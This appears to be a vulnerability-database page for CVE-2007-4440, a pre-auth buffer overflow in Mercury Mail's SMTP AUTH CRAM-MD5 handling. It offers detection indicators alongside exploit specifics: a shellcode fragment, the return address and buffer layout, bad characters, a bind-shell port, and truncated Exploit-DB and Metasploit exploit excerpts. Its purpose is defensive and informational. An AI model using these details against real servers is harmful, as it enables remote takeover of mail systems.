CVE-2007-4440
published 2007-08-21CVE-2007-4440: Stack-based buffer overflow in the MercuryS SMTP server in Mercury Mail Transport System, possibly 4.51 and earlier, allows remote attackers to execute…
PriorityP259high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
64.51%
99.1th percentile
Stack-based buffer overflow in the MercuryS SMTP server in Mercury Mail Transport System, possibly 4.51 and earlier, allows remote attackers to execute arbitrary code via a long AUTH CRAM-MD5 string. NOTE: this might overlap CVE-2006-5961.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pmail | mercury_mail_transport_system | <= 4.51 | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45\x3c
- →Detect exploitation attempts by monitoring SMTP traffic for an AUTH CRAM-MD5 command followed by an abnormally long base64-encoded string on port 25. ↗
- →The PoC sends a base64-encoded payload of 'QUFB' repeated 10000 times; alert on AUTH CRAM-MD5 responses followed by extremely long base64 strings (e.g., >1000 chars). ↗
- →The Metasploit exploit uses a buffer of 204 bytes of random uppercase alpha + return address + payload padded to 1075 bytes, all base64-encoded; flag AUTH CRAM-MD5 responses with base64 payloads exceeding ~1500 bytes. ↗
- →Post-exploitation: monitor for unexpected outbound bind shell connections on TCP port 1154 from the Mercury Mail server process. ↗
- →The exploit targets the return address 0x258d0d1e in ter32.dll; use memory integrity or module load monitoring to detect ROP/ret2lib abuse of this address in Mercury Mail. ↗
- →The exploit payload bad characters are null byte, LF, CR, space, and percent sign; payloads containing these in the AUTH CRAM-MD5 argument are likely not this exploit variant. ↗
- ·The vulnerability is pre-authentication; no valid credentials are required to trigger the overflow, meaning network-level SMTP access alone is sufficient for exploitation. ↗
- ·The Metasploit module targets only Mercury Mail Transport System 4.51 with the specific ret address in ter32.dll; other versions may require different offsets. ↗
- ·The CVE notes possible overlap with CVE-2006-5961, so detections may fire on both vulnerabilities if targeting the same AUTH CRAM-MD5 overflow vector. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Mercury/32 Mail SMTPD - AUTH CRAM-MD5 Buffer Overflow (Metasploit)
exploitdb·2010-06-22
CVE-2007-4440 Mercury/32 Mail SMTPD - AUTH CRAM-MD5 Buffer Overflow (Metasploit)
Mercury/32 Mail SMTPD - AUTH CRAM-MD5 Buffer Overflow (Metasploit)
---
##
# $Id: mercury_cram_md5.rb 9583 2010-06-22 19:11:05Z todb $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Mercury Mail Transport System 4.51.
By sending a specially crafted argument to the AUTH CRAM-MD5 command, an attacker
may be able to execute arbitrary code.
},
'Author' => [ 'MC' ],
'Version' => '$Revision: 9583 $',
'References' =>
[
[ 'CVE', '2
Exploit-DB
Mercury/32 Mail SMTPD 4.51 - SMTPD CRAM-MD5 Remote Overflow
exploitdb·2007-08-22
CVE-2007-4440 Mercury/32 Mail SMTPD 4.51 - SMTPD CRAM-MD5 Remote Overflow
Mercury/32 Mail SMTPD 4.51 - SMTPD CRAM-MD5 Remote Overflow
---
/*
Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Stack Overflow(Universal)
Public Version 1.0
http://www.ph4nt0m.org
2007-08-22
Code by: Zhenhan.Liu
Original POC: http://www.milw0rm.com/exploits/4294
Vuln Analysis: http://pstgroup.blogspot.com/2007/08/tipsmercury-smtpd-auth-cram-md5-pre.html
Our Mail-list: http://list.ph4nt0m.org (Chinese)
It will bind a cmdshell on port 1154 if successful.
Z:\Exp\Mercury SMTPD>mercury_smtpd.exe 127.0.0.1 25
== Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Stack Overflow
== Public Version 1.0
== http://www.ph4nt0m.org 2007-08-22
[*] connect to 127.0.0.1:25 ... OK!
[C] EHLO void#ph4nt0m.org
[S] 220 root ESMTP server ready.
[S] 250-root Hello void#ph4nt0m.org; ESMTPs are:
250-TIME
[S]
Exploit-DB
Mercury/32 Mail SMTPD - Remote Stack Overrun (PoC)
exploitdb·2007-08-18
CVE-2007-4440 Mercury/32 Mail SMTPD - Remote Stack Overrun (PoC)
Mercury/32 Mail SMTPD - Remote Stack Overrun (PoC)
---
# If there are images in this attachment, they will not be displayed. Download the original attachment
# Mercury Mail Transport System Remote Stack Based Overflow
# Overview
# Mercury Mail Transport System: Mercury is a free, standards-based mail server
# solution, providing comprehensive, fast server support for all major Internet e-
# mail protocols. It is supplied in two versions, one hosted on Windows systems,
# the other running as a set of NLMs on Novell NetWare file servers.
# Description
# There is a remotely exploitable stack based buffer overrun in the latest version of
# Mercury Mail Transport System. Specifically the SMTP Server does not properly
# handle long AUTH CRAM-MD5 strings resulting in a complete compromise of th
Metasploit
Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow
metasploit
Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow
Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow
This module exploits a stack buffer overflow in Mercury Mail Transport System 4.51. By sending a specially crafted argument to the AUTH CRAM-MD5 command, an attacker may be able to execute arbitrary code.
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2007-08/0341.htmlhttp://secunia.com/advisories/26519http://www.pmail.com/m32_451.htmhttp://www.securityfocus.com/bid/25357http://www.securitytracker.com/id?1018587http://www.vupen.com/english/advisories/2007/2918https://exchange.xforce.ibmcloud.com/vulnerabilities/36117https://exchange.xforce.ibmcloud.com/vulnerabilities/36299https://www.exploit-db.com/exploits/4294http://archives.neohapsis.com/archives/fulldisclosure/2007-08/0341.htmlhttp://secunia.com/advisories/26519http://www.pmail.com/m32_451.htmhttp://www.securityfocus.com/bid/25357http://www.securitytracker.com/id?1018587http://www.vupen.com/english/advisories/2007/2918https://exchange.xforce.ibmcloud.com/vulnerabilities/36117https://exchange.xforce.ibmcloud.com/vulnerabilities/36299https://www.exploit-db.com/exploits/4294
2007-08-21
Published